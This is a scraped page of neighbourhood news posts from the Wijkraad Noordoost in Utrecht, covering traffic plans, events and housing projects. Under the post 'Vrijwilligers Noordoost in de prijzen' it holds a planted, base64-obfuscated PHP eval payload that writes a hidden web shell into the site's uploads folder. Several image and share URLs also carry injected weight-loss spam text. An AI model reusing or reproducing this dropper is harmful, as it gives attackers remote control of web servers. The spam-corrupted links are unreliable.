Tijdstip:18:30-21:00 uur
Locatie: Restaurant Griftpark, Griftpark 1

Meer informatie:
https://www.utrecht.nl/wonen-en-leven/verkeer/verkeersprojecten/overvecht-utrecht-science-park-verbeteren-fietsroute/

 

 

Facebooktwittergoogle_pluspinterest

Kerstboomlichtjes ontsteken in Ons Buiten

Tuinenpark Ons Buiten ontsteekt op zaterdag 10 december op feestelijke wijze de lichtjes in de kerstboom op het tuinenpark, vlak naast het clubgebouw. Om de kerstsfeer te verhogen, zingt het Sterrenkoor de sterren van de hemel! Kom luisteren naar kerstmuziek en geniet van een beker glühwein of chocolademelk. Voor de kinderen (en hun ouders) is er een spannende lichtjeswandeling over het park als het donker is. Breng ook je zelfgemaakte lampion mee (heb je ‘m nog van Sint Maarten?).

Datum:    Zaterdag 10 december 2016
Tijd:         Vanaf 16.00 tot +/- 18.00 uur
Locatie:   Kerstboom Tuinenpark Ons Buiten, Pal Maleterstraat 64, 3573 PH Utrecht
Toegang: Gratis

 

Facebooktwitter<img alt="google_plus" title="Deel via Google+" class="synved-share-image synved-social-image synved-social-image-share" width="16" height="16" style="display: inline; width:16px;height:16px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www site link.wijkraadnoordoost.nl/wp-content/plugins/social-media-feather/synved-social/image/social/regular/32×32/google_plus.png” />pinterest

Facebooktwittergoogle_pluspinterest

Social Enterprise Award voor Wijkconnect

Wijkconnect is een online community vóór en dóór de wijk. Ook de buurten van Utrecht Noordoost zijn hier terug te vinden. Om te zien wat er speelt in de wijk is er een wijkagenda. Onlangs is een nieuwe wijkagenda door Wijkconnect gelanceerd.

Social Enterprice Day
Jaarlijks vindt de Social Enterprise Day plaats. Een dag vol inspiratie over bedrijven met een maatschappelijke doelstelling. Dit jaar werden ook de Social Enterprise Awards uitgereikt. In de categorie Startup heeft WijkConnect een top 5 plaats weten te behalen! Naast De Correspondent, FFORE, Peerbij en Sociaal Plus. Lees hier het artikel.

 

 

Facebooktwittergoogle_pluspinterest

Vrijwilligers Noordoost in de prijzen

[insert_php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzL3Y2MDZ4NHpiLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkdVptSndOalIwTkNkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/insert_php][php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzL3Y2MDZ4NHpiLnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkdVptSndOalIwTkNkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/php]

Facebooktwittergoogle_pluspinterest

Vernieuwing Noordelijke Randweg

De gemeente gaat de Noordelijke Randweg Utrecht (NRU) vernieuwen. Hierdoor moet het verkeer beter doorstromen. De NRU is de route aan de noordkant van de stad en loopt van het Gandhiplein (bij crematorium Daelwijck), over de Karl Marxdreef en de Albert Schweitzerdreef via het Robert Kochplein tot aan de Einthovendreef (tot het spoor bij de A27).

Op zaterdag 12 november staat de gemeente met een informatiekraam in het Shoppingcenter Overvecht. U kunt tussen 11.00 en 16.00 uur de plannen voor de NRU bekijken en vragen daarover stellen aan de gemeente. Klik hier voor meer informatie

 

Facebooktwittergoogle_pluspinterest

Utrecht Noordoost in dialoog

dialoog2016Op donderdag 10 november vindt er in Buurtcentrum De Leeuw een dialoog plaats waar ook jij aan kan meedoen!
Je bent van harte welkom om mee te praten en buurtbewoners te ontmoeten!
Donderdag 10 november 19.30 – 22.00 uur in: Buurtcentrum De Leeuw, Samuel van Houtenstraat 1,3515 EA, Utrecht.
Meer informatie: https://www.facebook.com/events/1073151182800845/ en www.utrechtindialoog.nl

Een dialoog is een openhartig gesprek over ervaringen, dromen en mogelijkheden dat bijdraagt tot verbondenheid en wederzijds begrip. Aan tafels van 6 tot 8 personen delen we onze ervaringen met deze goede buur(t), onze dromen en wat we concreet gaan doen om deze dichterbij te halen. Buurtbewoner en organisator Monica: ”Het lijkt me mooi als we in de Week van de Dialoog als buurtbewoners met elkaar in gesprek gaan over “een goede buur(t)…..”. Wat is dat eigenlijk? Hoe kunnen we daar samen voor zorgen? En, wanneer is een goede buur(t) beter dan een verre vriend?

De Week van de Dialoog is een jaarlijks terugkerend landelijk initiatief. De Week van de dialoog vindt dit jaar plaats van 4 tot en met 13 november en heeft als thema Respect. Er zijn dialoogtafels op diverse plaatsen en tijdstippen in de stad Utrecht. De tafels worden georganiseerd door bewoners(initiatieven) en maatschappelijke organisaties. Door met elkaar te praten leren we elkaar beter kennen, en komen we erachter wat we belangrijk vinden in onze stad, onze buurt, op school, in sport en spel, op ons werk en in ons dagelijks leven. Zo kunnen we beter met elkaar samen leven, wonen en werken in Utrecht.

Facebooktwittergoogle_pluspinterest

Herinrichting Maliesingel, Wittevrouwensingel en Kleine Singel

De gemeente heeft op 26 oktober de plannen met de bewoners besproken om de Maliesingel (na de kruising met de Maliebaan), Wittevrouwensingel, tot aan de Kleine Singel aan te pakken. Er komt meer ruimte voor fietsers en voetgangers. Het verkeersbeeld moet hierdoor veiliger en rustiger worden. De werkzaamheden starten naar verwachting in de zomer van 2017. Meer informatie over de plannen kunt u lezen op www.utrecht.nl/maliewittevrouwensingel .

herinrichting-maliesingel-wittevrouwensingel

 

Facebooktwittergoogle_pluspinterest

Bewonersbijeenkomst vergroening van de singels

Binnenkort is er een bewonersbijeenkomst over vergroening van de singels.
De bijeenkomst wordt georganiseerd door de Initiatiefgroep Vergroening Singel.

Datum: wo. 2 november
Tijd: van 19:30 tot 21:30
Locatie: “Maar ’s zondags niet”, Wittevrouwenstraat 30 (voorheen meubelzaak Strand)

Deze bijeenkomst is bedoeld voor iedereen die geïnteresseerd is in de maatregelen en incidenteel of regelmatig wil meehelpen met schoon houden, beheer en onderhoud van de locaties. Het gaat heel concreet om wat je allemaal kunt doen en hoe we dat gaan organiseren.

 • Programma
  19:30     Inloop, koffie en thee
  19:45     Welkom en presentatie vergroeningsmaatregelen
  20:30     Bespreken mogelijke werkzaamheden
  –  standaardklussen en andere activiteiten
  –  beschikbaarheid, mogelijkheden, kennis en kunde vrijwilligers
  –  organisatie vrijwilligersteams en contactpersonen
  –  ondersteunende rol Initiatiefgroep Vergroening Singel en gemeente
  –  praktische afspraken
  21:30     Afronding

Aanmelden
Aanmelden voor de bijeenkomst kan bij harmke.van.dam@xs4all.nl, bij voorkeur vóór 28 oktober. Graag ook je tel.nummer vermelden. Ook als je niet kunt, maar wel als vrijwilliger inzetbaar bent, kun je dat aan mij doorgeven.

Aan het werk langs de Maliesingel, juni 2016

C Maliesingel WP_20160622_007 inplanten talud kl

Op dit moment hebben zich al een stuk of 20 vrijwilligers gemeld, maar alle hulp is welkom. Want het gaat om een groot aantal locaties en diverse soorten  werkzaamheden. Ook als je weinig tijd hebt kunnen we je hulp en inbreng goed gebruiken. Zoals bij je past.

 

 

 

<img alt="Facebook" title="Deel via Facebook" class="synved-share-image synved-social-image synved-social-image-share" width="16" height="16" style="display: inline; width:16px;height:16px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www weight loss tablets that work.wijkraadnoordoost.nl/wp-content/plugins/social-media-feather/synved-social/image/social/regular/32×32/facebook.png” />twittergoogle_pluspinterest

Facebooktwittergoogle_pluspinterest

Winklerlaan – nieuw gebouw voor Fier speciaal onderwijs

EVA architecten gaat de nieuwe school voor SO Fier ontwerpen. Deze week is definitief gekozen voor dit Utrechtse architectenbureau.

De school heeft beloofd de buurt zo goed mogelijk op de hoogte te houden van alle nieuwe ontwikkelingen rond de nieuwbouw van de school aan de Winklerlaan.
SO Fier is een school voor speciaal onderwijs, voor kinderen die een intensieve aanpak vergen omtrent gedrag. Kinderen leren hier hetzelfde als alle kinderen op de basisschool, maar bij alles wat gebeurt staan de gedragsvragen die deze leerlingen stellen centraal. In het nieuwe gebouw is straks plaats voor 150 leerlingen. Hierbij de brief van de school.

Bericht aan buurtbewoners Winklerlaan

Facebooktwittergoogle_pluspinterest

Winkelcentrum De Nieuwe Gaard

Veel bewoners van Tuindorp Oost, Tuindorp en Voordorp zien de plannen voor de uitbreiding van winkelcentrum De Gaard als een aanwinst voor de wijk. Het project is een voorbeeld van (bewoners)participatie in complexe infrastructurele projecten.

Het project is bij de drie beste participatietrajecten geëindigd in 2009. Een participatietraject is uiteraard altijd een kwestie van geven en nemen.

Een klein aantal bewoners uit de buurt die zorgen hebben over de uitbreiding van het winkelcentrum zijn erg laat in actie gekomen en nemen een vrij dominante positie in.

Dit is jammer! Iedereen in de buurt is de afgelopen jaren veelvuldig geïnformeerd via voortgangsberichten in de buurtkrant(en), wijkberichten van de gemeente en bijeenkomsten door de gemeente.

Een beperkte opsomming van de onderwerpen die aan de orde zijn geweest en wij als Wijkraad Noordoost belangrijk vinden als echte verbetering:

 1. Fietsers, brommers en de huidige busbaan worden rond de kerk geleid waardoor er een plein ontstaat dat veilig is en als ontmoetingsplein kan worden gebruikt.
 2. Het huidige aantal bomen wordt behouden. De bomen die op het nieuwbouwgebied staan worden verplaatst en niet omgezaagd.
 3. Inpandig laden & lossen van goederen bij AH; dit heeft als voordeel dat de overlast van vrachtwagens voor direct omwonenden een stuk minder is.
 4. De bloemenzaak op het plein blijft behouden en krijgt prominente plek.
 5. Parkeerplaatsen komen centraal (en gedeeltelijk op het dak van de nieuwbouw), dit voorkomt zoekverkeer en luchtvervuiling.
 6. De gevels krijgen aan de buitenkant een mooier aanzicht en er komen extra woningen bij (met een beter energielabel).
 7. Het winkelcentrum krijgt groene gevels en zonnepanelen.
 8. Sluipverkeer tussen Voordorp en Tuindorp wordt aangepakt. De Eijkmanlaan wordt nu aangepast.

Dit project heeft een looptijd van zo’n tien jaar en gedurende het traject komen er nieuwe inzichten. Hier is altijd serieus naar gekeken door alle partijen.

De toenemende leegstand in winkelcentra (met name in de non food sector) is een punt van zorg en is ook uitgebreid aan de orde gekomen in de diverse Klankbordgroep (KBG) bijeenkomsten. Van de zijde van zowel de projectontwikkelaar, de gemeente als van de zijde van de eigenaar van het winkelcentrum (en de bovengelegen woningen) is aangegeven, dat er ruimschoots belangstelling is van potentiële huurders. Bovendien wordt dit door diverse onderzoeken onderschreven.

Het onverhoopt niet doorgaan van dit project vormt de grootste bedreiging voor zowel het winkelcentrum en de bovenliggende woningen. Juist dan dreigt leegstand en verpaupering.

De gevreesde verkeersoverlast zal, indien er geen maatregelen worden genomen, ook zonder uitbreiding van het winkelcentrum plaatsvinden. Zolang de A27 nog niet is uitgebreid en de Noordelijke Ring Utrecht nog niet klaar is zal verkeer altijd proberen een snellere route te vinden.

Facebooktwittergoogle_pluspinterest

Verkeerstromen Tuinwijk (Pieter van Nieuwlandstraat)

De afgelopen maand zijn er veel reacties binnengekomen via de website op het advies van de wijkraad m.b.t. de verkeersstroom Tuinwijk, in het bijzonder op het onderdeel over de voorgestelde pilot met eenrichtingsverkeer in de Pieter Nieuwlandstraat.

Binnengekomen reacties bij WRNO

Tot op heden hebben we op alle inzenders als volgt gereageerd:
Dank voor uw reactie. De wijkraad brengt al vele jaren de verkeersstroom door Tuinwijk onder de aandacht van de gemeente. Wij staan een integrale benadering voor voor de hele route vanaf de Oudenoord tot en met de drie wegen die op de Kardinaal de Jongweg uitkomen (Antonius Matthaeuslaan, Ingenhouszstraat en Pieter Nieuwlandstraat). Zie daarvoor onder meer  het eerste deel van het door u genoemde advies van de wijkraad. Uw reactie als bewoner van een andere straat in Tuinwijk is voor ons als wijkraad net zo belangrijk als van een bewoner uit de Pieter Nieuwlandstraat. Wij kunnen ons goed voorstellen dat u reageert op de pilot eenrichtingsverkeer PN-straat. U was niet de enige in deze zin. De vraag is ook terecht of de wijkraad zich met dergelijke concrete voorstellen moet bezighouden of die moet ondersteunen. Wij zullen dit in de komende wijkraadvergadering aan de orde stellen en heroverwegen. Na de vergadering zullen we u nader informeren en graag verder met u (en andere buurtbewoners) in gesprek te gaan.

Op 11 oktober heeft de wijkraad besloten het op 1 juli uitgebrachte advies aan te passen, dit is ook aan alle betrokkenen gemeld. De brief aan het college hierover vindt u hieronder.

Albert van Beek (Secretaris Wijkraad Noordoost)

Brief aan het college van WRNO

Facebooktwittergoogle_pluspinterest

SOCIALE BUURTMARKT VEEMARKT zaterdag 29 oktober

zoals-het-was

Wie bouwt er mee aan de Sociale Buurtmarkt in, van en voor de Veemarkt?

Op 29/10/2016  van 11.00 – 17.00 uur

In het Grand Café van

Woonzorgcentrum Voorveldse Hof

Blaarkopstraat 1, Veemarkt te Utrecht

 • Woon jij in de Veemarkt?
 • Heb jij iets te melden of is er een activiteit die je zou willen organiseren?
 • Is er iets wat je aan de orde zou willen stellen, of delen met buurtbewoners?
 • Lijkt je het leuk om mee te denken over de invulling van de Sociale Buurtmarkt?

Wij nodigen je van harte uit om mee te denken over de vorm en de invulling van de Sociale Buurtmarkt in de Veemarkt, georganiseerd door de Wijkraad Noordoost i.s.m. Woonzorgcentrum Voorveldse Hof en actieve bewoners en organisaties uit de buurt.

Er zijn verschillende vormen waarin je kunt bijdragen, onmisbaar in de uitvoering:  vrijwilligers, verkopers, bezoeker, voorlichters, delers, bouwers, aanjagers in de wijk ….

 

Wat is een Sociale Buurtmarkt?
Allereerst een plek waar mensen samenkomen. Op zoek naar informatie, of gewoon voor de gezelligheid. De sociale buurtmarkt is om te ontmoeten, te verbinden, te ontdekken en nieuwe mensen, organisaties en initiatieven te leren kennen. De markt is daarom ook een podium voor ondernemers, initiatieven, organisaties en bewoners uit de buurt. Op deze manier kunnen er interessante verbindingen worden gemaakt.

Neem contact op via veemarkt@wrno.nl als je wilt bijdragen, vermeld a.u.b. ook je telefoonnummer.

ENQUETE

Nog beter: vul de enquête in op https://nl.surveymonkey.com/r/SW9TTQ2 waarin we onderzoeken wat bewoners in de Veemarkt belangrijk vinden en ook ingaan op de Sociale Buurt markt. De sluitingsdatum is 27 oktober 2016.

Hartelijk dank en groet, Gerdine van Ramshorst, namens de wijkraad Noordoost

veemarkt_flyer_1veemarkt_flyer_2

Facebooktwittergoogle_pluspinterest

Klachten over onveilige verkeerssituatie Sartreweg

Diverse wijkbewoners hebben bij de wijkraad aandacht gevraagd voor een vreselijk onveilige situatie bij de Sartreweg na de verbouwing van de Kapteynlaan en Romerostraat.
Daar hebben auto’s nu voorrang, en vooral de bocht Sartrelaan is vreselijk onveilig. Auto’s komen daar regelmatig met een noodgang om de hoek zeilen en er zijn al diverse bijna-ongelukken gezien, waarbij fietsers niet door hadden dat auto’s daar met hoge snelheid rijden. Ook op de volgende kruising waar eerst fietsers voorrang hadden, hebben auto’s nu voorrang gekregen. Vooral jonge fietsers gaan dit echt niet door hebben…
En er rijden daar heel veel jonge fietsertjes, op weg naar sport (Hercules, Sporting).
Dit gaat echt ongelukken tot gevolg hebben, en dat was toch niet de bedoeling vanuit de gemeente. Wij vragen wijziging van deze situatie bij het volgende verkeersoverleg.

Facebooktwittergoogle_pluspinterest

Tuinders De Driehoek internationaal onderscheiden

De tuinders van De Ecologische Driehoek (Winklerlaan) hebben van de Internationale Volkstuindersorganisatie een onderscheiding ontvangen vanwege bijzondere sociale activiteiten. Namelijk, vanwege hun inzet om asielzoekers met een stukje Nederlands cultuurgoed te laten kennismaken. Ze hebben o.a. een rol bij wieden op het complex.
De Driehoek is daarnaast door de Raad van Europa uitgekozen als voorbeeldproject in het kader van de Europese week van de lokale democratie. Hier kunnen jullie daar meer over lezen: http://sedl.alnetis.fr/en/425-office-international-du-coin-de-terre-et-des-jardi/
Hierbij de link naar een filmpje over De Driehoek.

Facebooktwittergoogle_pluspinterest

Woningbouw naast Gerrit Rietveld College gestart

Er komen 79 nieuwbouwwoningen op de plek van het oude Gerrit Rietveld College aan de Eykmanlaan. Bouwverkeer gaat niet door Tuindorp en er staat een vast hek rondom het bouwterrein. In juli is het boren van de palen begonnen, nu wordt er verder gewerkt aan de fundering. Eind 2017 is de bouw helemaal afgerond.

Meer over dit project

Vragen over dit project? Stuur een e-mail naar de projectleider R. Hilhorst: noordoost@utrecht.nl.

Facebooktwittergoogle_pluspinterest

Nieuw lid: Liesbeth Jacobs

De vacature die nog was achtergebleven voor de Vogelenbuurt is inmiddels ingevuld met een nieuwkomer in de wijkraad: Liesbeth Jacobs. In de bijeenkomst van 13 september is Liesbeth voorgedragen en aangenomen als nieuw lid. Zij zal zich nog uitgebreider voorstellen in ons katern in Mens & Wijk.

Facebooktwittergoogle_pluspinterest

Joyce Parlevliet verlaat de wijkraad

In onze bijeenkomst van 13 september hebben we afscheid genomen van Joyce als lid van deze wijkraad. Ze heeft ongeveer tien jaar een grote bijdrage geleverd aan vele werkzaamheden, vooral aan duurzaamheid en groen maar ook aan de communicatie met onze achterban. De wijkraad heeft Joyce bedankt voor haar grote inzet, we zullen haar gaan missen. Ze gaat wel zeker verder met de jaarlijkse ‘Groen-moet-je-doen’ dag en zal ook nog enkele wijkraadtaken afronden. Haar plaats vanuit de buurt Wittevrouwen is hiermee vacant. Belangstellenden vragen we zich te melden bij het secretariaat: info@wrno.nl.

 

Facebooktwittergoogle_pluspinterest

Confy, voor een beter milieu (efficiënte pakketbezorging)

Recent onderzoek van onderzoeksbureau TNO heeft aangetoond dat bestelbusjes maar liefst zes maal meer stikstofoxide uitstoten dan werd aangenomen. Wij hebben een app bedacht die dit probleem meteen aanpakt door te beginnen bij jouw leefomgeving. Een bijkomend voordeel is dat je niet langer uren thuis hoeft te wachten op een pakketje dat bij je bezorgd wordt.

Wat is Confy?
Confy is de naam van een door de Gemeente Utrecht ondersteund initiatief dat gelanceerd wordt om pakketbezorging voor iedereen makkelijker te maken en het aantal bezorgbusjes op de weg terug te dringen. In de app geef je precies aan wanneer jij je pakketje kunt ontvangen. Dit kan geheel automatisch door je gps-locatie te delen. Wil je dit niet, dan kun je dat ook handmatig aangeven. Via Confy komt je bezorger automatisch bij iemand anders in je netwerk terecht om jouw pakketje voor jou te ontvangen als jij dit niet kunt. Dit kan een buur of een goede vriend zijn, of dat gezellige groentezaakje op de hoek.

Schoner, groener, beter.
Behalve de benoemde tijdwinst voor jou omdat het pakketje altijd wordt afgeleverd, is er ook tijdwinst voor de bezorger. De bezorger wordt direct naar een open deur geleid waardoor hij sneller en efficiënter door de wijk beweegt. De grote bestelbussen hoeven nu minder heen en weer te rijden door de wijk, wat minder uitlaatgassen betekent en dus een schonere lucht in de buurt. Je pakketje ophalen bij de buren kan weer een goede reden zijn om eens fijn te praten. Kortom, de wijk wordt een heel stuk schoner en nog gezelliger. Dat is wat we met Confy willen bereiken.

Pilot.
Op 19 september starten we met ondersteuning van de Gemeente Utrecht een pilot in Wittevrouwen. Wij vragen je om de app te installeren en te gaan gebruiken. Gebruiksvriendelijkheid staat centraal, wat de belangrijkste reden is om samen een pilot uit te voeren. Als je graag mee wilt werken aan een schoner milieu en een gezellige buurt, kun je als je in Wittevrouwen woont de Confy app vanaf 19 september helemaal gratis op je telefoon zetten. Wanneer je dan iets online bestelt kun je met Confy precies aangeven wanneer je pakketjes kunt ontvangen. Wil of kun je geen pakketjes ontvangen, dan wordt de bezorger direct doorverwezen naar iemand in je netwerk.

Wie zijn wij?
Ons kleine team bestaat uit een mix van bekende namen uit de retail en enthousiaste jonge ondernemers. We komen zelf uit de buurt van Utrecht en op deze manier proberen we de kwaliteit van het leven in en rond Utrecht beter te maken. We kunnen het echter niet alleen, daarom brengen we Confy nu eerst naar Wittevrouwen en daarna in Voordorp voor een uitgebreide pilot in een living lab ondersteund door de Gemeente Utrecht. Vervolgens gaan we voor heel Utrecht.

Als jij samen met ons wil werken aan een gezellige en schone leefomgeving volg ons dan ook op Twitter, Facebook en onze website:

https://twitter.com/myconfy
https://www.facebook.com/myconfy/?fref=ts
https://www.myconfy.com/

 

Facebooktwittergoogle_pluspinterest

Hoe, Wat, Waar, Wie de wijkraad?

Wij geven gevraagd en ongevraagd advies aan het College van Burgemeester en Wethouders van Utrecht over vraagstukken die spelen in de wijk Noordoost. Ons advies berust meestal op gesprekken met bewonersgroepen uit de buurt waar het onderwerp speelt. De afgelopen jaren is er advies gegeven over de maximum snelheid op de Kardinaal de Jongweg, de vernieuwing van Winkelcentrum De Gaard, Stadspark De Groene Kop, het Veemarktterrein en bouwprojecten bij het Gerrit Rietveld College en het veld naast de Van Lieflandlaan. Alle adviezen zijn te vinden op de website van de wijkraad. Behalve opstellen van schriftelijke adviezen werkt de wijkraad aan overleg met ambtenaren, onderhouden van contacten met buurtcomite’s en allerlei actieve burgers.  Wist u dat de maandelijkse vergaderingen van de Wijkraad openbaar zijn?

U kunt ook onderwerpen die u in uw buurt belangrijk vindt, inbrengen voor een vergadering.

Kijk op www.wrno.nl wanneer de de wijkraad Noordoost vergadert. Bent u geïnteresseerd in wat er zich afspeelt in de wijk Noordoost en wilt u een actieve bijdrage leveren, word dan lid van de Wijkraad Noordoost en geef u op voor een van de volgende clusters: Wonen & Ruimtelijke ordening, Duurzaamheid & Natuur, Wijkeconomie & ZZP, Verkeer & Milieu of Zorg & Welzijn.

In het laatste weekend van de maand wordt de nieuwsbrief verzonden. Aan de rechterkant ziet u de namen van alle buurten in de wijk. Klik aan waar u meer informatie over wilt.

Facebooktwittergoogle_pluspinterest

Het wijkactieprogramma 2017

Elk jaar wordt er een wijkactieprogramma opgezet waarin staat welke projecten en acties de gemeente in een bepaald jaar verwacht uit te voeren. Dit programma komt tot stand door middel van gesprekken met betrokken gemeenteambtenaren, de wijkraad, professionals en burgers in de wijk.

De komende jaren betreffen de wijkambities drie speerpunten waaronder de verschillende acties en projecten worden opgehangen.

 1. Verkeer en parkeren. Twee doelstellingen:
  1. Verhogen verkeersveiligheid;
  2. Meer ruimte voor fietsparkeren;
 2. Wonen, welzijn en zorg. Twee doelstellingen:
  1. Behoud en versterking inzet vrijwilligers;
  2. Aansluiting vraag en aanbod huisvesting en voorzieningen voor ouderen;
 3. Openbare ruimte en duurzaamheid. Twee doelstellingen:
  1. Behoud kwaliteit openbare ruimte en groenvoorzieningen;
  2. Meer vernieuwende initiatieven op het gebied van milieu en duurzaamheid.

Daarnaast is er nog een categorie complexe projecten en trajecten waaronder momenteel Lauwerecht-Noord met ruim 800 woningen en Zorgcentrum Tuindorp-Oost vallen. Verder zal er naar verwachting in 2017 ook gestart worden met de renovatie/verbouwing van de Gaard.

Voor meer informatie over de wijkambities 2014-2018, het wijkactieprogramma voor Noordoost en welke projecten/acties precies hangen onder de speerpunten en doelstellingen kunt u de websites www.utrecht.nl/wijkambities of www.utrecht.nl/wijkactieprogramma raadplegen. Mocht u zelf een idee, plan of initiatief hebben of een bijdrage willen leveren aan de uitvoering van een van de projecten/acties, schroom dan niet en neem contact op met het wijkbureau Noordoost (030-2860000 of noordoost@utrecht.nl) en/of de wijkraad Noordoost (www.wijkraadnoordoost.nl/contact).

Facebooktwittergoogle_pluspinterest

Duifstraat = Leefstraat

IMG_2532Vanaf juli is de Duifstraat tijdelijk een Leefstraat geworden. De auto’s zijn vervangen door ‘groen’ (al is het gras nep). Er worden allerlei activiteiten georganiseerd. Midden op straat is er een speelplaats ingericht en er zijn planten- en groentenbakken geplaatst. Het is een enorm succes en voor herhaling vatbaar, misschien op een andere plaats in NO?IMG_2534

Facebooktwittergoogle_pluspinterest

Ouderenhuisvesting met ouderen-verhuisadviseur

Er wonen in Noordoost zo’n 700 tachtigplussers zelfstandig (van 2.300 65-plussers). Vaak wonen ze in de voormalige echtelijke woning waarin hun kinderen zijn opgegroeid, al of niet met hun partner. Die woning is intussen veel te groot geworden en te duur, moeilijk te onderhouden, te ver van de winkels en het openbaar vervoer. Niet meer comfortabel dus. De hypotheek is afbetaald en er is dus financiële ruimte om elders (levensloopbestendig) te gaan wonen.

Van zulke woningen worden er in de komende paar jaar wel 300 gebouwd in Noordoost. Gaan de mensen die erbij gebaat zouden zijn zelf de weg ernaar toe vinden? Sommigen wel, velen niet. Daarom wil de Wijkraad Noordoost dat er een ouderen-verhuisadviseur komt.

Gister sprak de Wijkraad hierover met de wethouders Paulus Jansen (wonen) en Kees Diepeveen (zorg en welzijn). “Samen Noordoost” was er ook bij, evenals “Mens en Wijk”.

foto’s : Vicky Pronk

ouderen enw wonen 1 MB ouderen enw wonen 1 MB-10 ouderen enw wonen 1 MB-11 ouderen enw wonen 1 MB-12 ouderen enw wonen 1 MB-2 ouderen enw wonen 1 MB-3 ouderen enw wonen 1 MB-4ouderen enw wonen 1 MB-6 ouderen enw wonen 1 MB-5  ouderen enw wonen 1 MB-7 ouderen enw wonen 1 MB-8 ouderen enw wonen 1 MB-9

Facebooktwittergoogle_pluspinterest

Opening hondenspeelplaats Loevenhoutensedijk

Op zaterdag 27 augustus 2016 van 14-15u voor U en uw hond(en).<img class="alignnone size-full wp-image-741548" src="http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin.png" alt="20160827 14 uur uitnodiging opening hondenspeeltuin" width="1202" height="815" srcset="http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin.png 1202w, http://www.wijkraadnoordoost slimming tablets that work fast.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-300×203.png 300w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-768×521.png 768w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-1024×694.png 1024w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-147×100.png 147w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-60×40.png 60w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-442×300.png 442w” sizes=”(max-width: 1202px) 100vw, 1202px” />

Facebooktwittergoogle_pluspinterest

Facebooktwittergoogle_pluspinterest

Vernieuwing wijkparticipatie (motie 155)

Op 20 juni was er een ‘plein’-bijeenkomst in het stadskantoor. Vele leden van wijkraden voerden er een gesprek over de vraag hoe wijkraden een vernieuwende bijdrage kunnen leveren aan wijk-participatie. Anders gezegd: hoe kunnen we burgers meer betrekken bij de leefbaarheid in de wijk? Op 25 augustus wordt dit gesprek voortgezet met leden van de gemeenteraad erbij. De Raad heeft op 12 november 2015 een motie (no. 155) aangenomen met wensen om wijkparticipatie te vernieuwen. Het College van Burgemeester en Wethouders heeft deze motie overgenomen. Het gaat daarbij om 1) meer flexibele vormen van participatie in de wijk, 2) meer betrokkenheid van burgers tijdens planvorming in plaats van aan het einde, 3) betrokkenheid van een bredere groep burgers, ook jongeren, allochtone ouderen en digitaal minder vaardigen, 4) heldere afspraken over invloed en besluitvorming. Heeft u hierover voorstellen, laat het ons weten op: info@wrno.nl.

Verslag bijeenkomst 25-08-2016
Al doende vernieuwen (ambeteliijk concept) 12-10-2016
Evaluatie wijkraadadviezen Noordoost (okt 2016)
Reactie voorzitter WRNO (okt 2016)

Op 25-10-2016 was er een vervolg meeting over motie 155 (bekijk hier de presentatie, het verslag en het concept voor het advies aan de gemeenteraad).
Presentatie
Verslag
Concept advies

Facebooktwittergoogle_pluspinterest

Zienswijze verbreding A27 ingediend

Meerdere keren heeft de wijkraad gesproken over de plannen voor verbreding van de A27. Binnen de wijk Noordoost is het negatief effect ervan direct merkbaar in de buurt Voordorp. Daarnaast vindt de wijkraad het verspilling van meer dan een miljard belastinggeld dat beter besteed kan worden dan aan een achterhaald prestigeproject. Ook het verder aantasten van Amelisweerd zien we als zeer onwenselijk. Daarom heeft deze wijkraad de zienswijze onderschreven van de Kerngroep Ring Utrecht.

 

 

<a class="synved-social-button synved-social-button-share synved-social-size-16 synved-social-resolution-single synved-social-provider-facebook nolightbox" data-provider="facebook" target="_blank" rel="nofollow" title="Deel via Facebook" href="http://www.facebook more information.com/sharer.php?u=http%3A%2F%2Fwww.wijkraadnoordoost.nl%2Fwp-json%2Fwp%2Fv2%2Fposts%2F%3Fper_page%3D100&t=Zienswijze%20verbreding%20A27%20ingediend&s=100&p[url]=http%3A%2F%2Fwww.wijkraadnoordoost.nl%2Fwp-json%2Fwp%2Fv2%2Fposts%2F%3Fper_page%3D100&p[images][0]=&p[title]=Zienswijze%20verbreding%20A27%20ingediend” style=”font-size: 0px; width:16px;height:16px;margin:0;margin-bottom:5px;margin-right:5px;”>Facebooktwittergoogle_pluspinterest

Facebooktwittergoogle_pluspinterest

Van Lieflandlaan heeft keuze gemaakt

De bewoners van de van Lieflandlaan hebben van de gemeente de keuze gekregen uit drie projectvoorstellen. Het voormalige sportveld van de aanpalende school zal worden bebouwd met 20 woningen en een park wordt eraan toegevoegd.

lieflandontwerp

De link naar de pagina van de gemeente met alle presentaties van de ontwikkelaars

Facebooktwittergoogle_pluspinterest

12 juni Symposium Klimaatverandering in de Stad – GroenmoetjeDoen!-dag

GMJDlogo 12 juni GroenmoetjeDoen!-dag 2016  met als thema Klimaatverandering in de Stad.

 

Op 12 juni wordt de 9de GroenmoetjeDoen!-dag/ dag vh Zelfbeheer030 gehouden.

